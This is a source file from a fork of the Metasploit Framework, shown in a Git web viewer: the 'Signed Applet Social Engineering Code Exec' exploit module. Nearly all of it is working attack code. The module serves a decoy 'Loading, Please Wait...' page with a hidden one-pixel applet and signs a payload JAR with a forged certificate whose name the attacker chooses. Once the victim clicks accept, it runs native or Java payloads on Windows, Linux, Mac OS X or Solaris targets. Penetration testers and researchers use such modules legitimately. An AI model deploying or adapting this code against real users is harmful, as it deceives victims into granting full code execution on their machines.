adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
191c4e8eb77272912aa130c8d6ff9f8cc884db73
metasploit-gs/modules/exploits/multi/browser/java_signed_applet.rb
T
James Lee 191c4e8eb7 make java_signed_applet work with generic java payloads, but keep the default target as Windows/x86 since it is by far the most common victim. 
git-svn-id: file:///home/svn/framework3/trunk@11172 4d416f70-5f16-0410-b530-b9f4589650da
2010-11-30 03:50:40 +00:00

186 lines
5.7 KiB
Ruby
Raw Blame History

##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Java
include Msf::Exploit::EXE
def initialize( info = {} )
super( update_info( info,
'Name' => 'Signed Applet Social Engineering Code Exec',
'Description' => %q{
This exploit dynamically creates an applet via the Msf::Exploit::Java mixin, converts it
to a .jar file, then signs the .jar with a dynamically created certificate containing
values of your choosing. This is presented to the end user via a web page with an applet
tag, loading the signed applet.
The user's JVM pops a dialog asking if they trust the signed applet and displays the
values chosen. Once the user clicks 'accept', the applet executes with full user
permissions.
The java payload used in this exploit is derived from Stephen Fewer's and HDM's payload
created for the CVE-2008-5353 java deserialization exploit.
This module requires the rjb rubygem, the JDK, and the $JAVA_HOME variable to be set.
If these dependencies are not present, the exploit falls back to a static, signed
JAR.
},
'License' => MSF_LICENSE,
'Author' => [ 'natron' ],
'Version' => '$Revision$',
'References' =>
[
[ 'URL', 'http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-valsmith-metaphish.pdf' ],
],
'Platform' => [ 'java', 'win', 'osx', 'linux', 'solaris' ],
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)',
{
'Platform' => ['java'],
'Arch' => ARCH_JAVA
}
],
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
}
],
[ 'Linux x86 (Native Payload)',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
}
],
[ 'Mac OS X PPC (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_PPC,
}
],
[ 'Mac OS X x86 (Native Payload)',
{
'Platform' => 'osx',
'Arch' => ARCH_X86,
}
],
],
'DefaultTarget' => 1
))
register_options(
[
OptString.new( 'CERTCN', [ true, "The CN= value for the certificate.", "Metasploit Inc." ]),
OptString.new( 'APPLETNAME', [ true, "The main applet's class name.", "SiteLoader" ]),
OptString.new('PAYLOADNAME', [ true, "The payload classes name.", "SiteSupport" ]),
# Not implemented yet.
#OptString.new('PACKAGENAME', [ true, "The package name for gen'd classes.","x" ]),
#OptString.new('CUSTOMJAR', [ false, "A custom .jar applet to use.", nil]),
], self.class)
register_advanced_options(
[
OptString.new('SaveToFile', [ false, "When set, source is saved to this directory under external/source/", nil ])
], self.class)
end
def on_request_uri( cli, request )
payload = regenerate_payload(cli)
if not payload
print_error( "Failed to generate the payload." )
# Send them a 404 so the browser doesn't hang waiting for data
# that will never come.
send_not_found(cli)
return
end
if not request.uri.match(/\.jar$/i)
if not request.uri.match(/\/$/)
send_redirect( cli, get_resource() + '/', '')
return
end
print_status( "Handling request from #{cli.peerhost}:#{cli.peerport}..." )
send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
return
end
# If we haven't returned yet, then this is a request for our applet
# jar, build one for this victim.
p = regenerate_payload(cli)
jar = p.encoded_jar
files = [
"metasploit/Payload.class",
"metasploit/PayloadApplet.class",
"META-INF/MANIFEST.MF",
"META-INF/SIGNFILE.DSA",
"META-INF/SIGNFILE.SF",
]
# Ghetto. Replace existing files in the Jar, then add in
# anything that wasn't replaced. The reason for replacing the
# .class files is to ensure that we're sending the
# Payload.class as was signed rather than a newer one that was
# updated without updating the signature. We'll just have to
# cross our fingers and hope that any updates don't break
# backwards compatibility in the handler until we can get
# signing to work from ruby. Once we can sign jars directly
# from ruby using OpenSSL, this won't be a problem.
replaced = []
# Replace the ones that are already there.
jar.entries.map do |e|
file = File.join(Msf::Config.data_directory, "exploits", "java_signed_applet", e.name)
if File.file? file
File.open(file, "rb") do |f|
e.data = f.read(f.stat.size)
end
end
replaced << e.name
end
# Add the rest
files.each { |e|
next if replaced.include? e
file = File.join(Msf::Config.data_directory, "exploits", "java_signed_applet", e)
File.open(file, "rb") do |f|
jar.add_file(e, f.read(f.stat.size))
end
}
print_status( "Sending #{datastore['APPLETNAME']}.jar to #{cli.peerhost}:#{cli.peerport}. Waiting for user to click 'accept'..." )
send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
handler( cli )
end
def generate_html
html = %Q|<html><head><title>Loading, Please Wait...</title></head> |
html += %Q|<body><center><p>Loading, Please Wait...</p></center> |
html += %Q|<applet archive="#{datastore["APPLETNAME"]}.jar" |
html += %Q| code="metasploit.PayloadApplet" width="1" height="1">\n|
html += %Q|</applet></body></html>|
return html
end
end
Reference in New Issue View Git Blame Copy Permalink